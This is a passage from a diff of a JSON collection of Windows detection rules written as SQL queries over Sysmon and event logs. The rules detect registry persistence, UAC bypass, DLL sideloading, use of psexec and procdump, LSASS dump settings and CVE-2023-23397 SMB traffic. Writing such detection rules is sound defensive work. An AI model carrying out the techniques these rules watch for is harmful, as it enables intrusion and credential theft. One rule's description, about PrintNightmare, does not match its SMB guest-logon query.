LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (SourceImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR SourceImage LIKE '%unknown process%' ESCAPE '\\' OR StartFunction = 'EtwpNotificationThread'))" ], - "filename": "registry_set_servicedll_hijack.yml" + "filename": "create_remote_thread_win_susp_remote_thread_target.yml" }, { - "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", - "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "title": "Remote Thread Creation Via PowerShell", + "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", "status": "test", - "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", - "author": "frack113", + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1133" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "create_remote_thread_win_powershell_crt.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", - "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL", + "id": "cbe51394-cd93-4473-b555-edf0144952d9", + "status": "test", + "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_dns_server_susp_server_level_plugin_dll.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Unsigned Binary Loaded From Suspicious Location", + "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Microsoft Defender Blocked from Loading Unsigned DLL", + "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "status": "experimental", + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Standard User In High Privileged Group", + "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely" + "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_lsa_server_normal_user_admin.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Sysinternals Tools AppX Versions Execution", + "id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the applications from the Windows Store" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppModel-Runtime/Admin' AND EventID = '201' AND ImageName IN ('procdump.exe', 'psloglist.exe', 'psexec.exe', 'livekd.exe', 'ADExplorer.exe'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", - "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "title": "Suspicious Rejected SMB Guest Logon From IP", + "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "status": "test", + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Account fallback reasons (after failed login with specific account)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_smbclient_security_susp_failed_guest_logon.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Potential CVE-2023-23397 Exploitation Attempt - SMB", + "id": "de96b824-02b0-4241-9356-7e9b47f04bac", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "description": "Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.exfiltration", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Some false positives may occur from external trusted servers. Apply additional filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID IN ('30803', '30804', '30806') AND NOT (((ServerAddress LIKE '10.%' ESCAPE '\\' OR ServerAddress LIKE '192.168.%' ESCAPE '\\' OR ServerAddress LIKE '172.16.%' ESCAPE '\\' OR ServerAddress LIKE '172.17.%' ESCAPE '\\' OR ServerAddress LIKE '172.18.%' ESCAPE '\\' OR ServerAddress LIKE '172.19.%' ESCAPE '\\' OR ServerAddress LIKE '172.20.%' ESCAPE '\\' OR ServerAddress LIKE '172.21.%' ESCAPE '\\' OR ServerAddress LIKE '172.22.%' ESCAPE '\\' OR ServerAddress LIKE '172.23.%' ESCAPE '\\' OR ServerAddress LIKE '172.24.%' ESCAPE '\\' OR ServerAddress LIKE '172.25.%' ESCAPE '\\' OR ServerAddress LIKE '172.26.%' ESCAPE '\\' OR ServerAddress LIKE '172.27.%' ESCAPE '\\' OR ServerAddress LIKE '172.28.%' ESCAPE '\\' OR ServerAddress LIKE '172.29.%' ESCAPE '\\' OR ServerAddress LIKE '172.30.%' ESCAPE '\\' OR ServerAddress LIKE '172.31.%' ESCAPE '\\' OR ServerAddress LIKE '127.%' ESCAPE '\\' OR ServerAddress LIKE '169.254.%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_smbclient_connectivity_exploit_cve_2023_23397_outlook_remote_file.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "MSExchange Transport Agent Installation - Builtin", + "id": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", + "status": "test", + "description": "Detects the Installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron 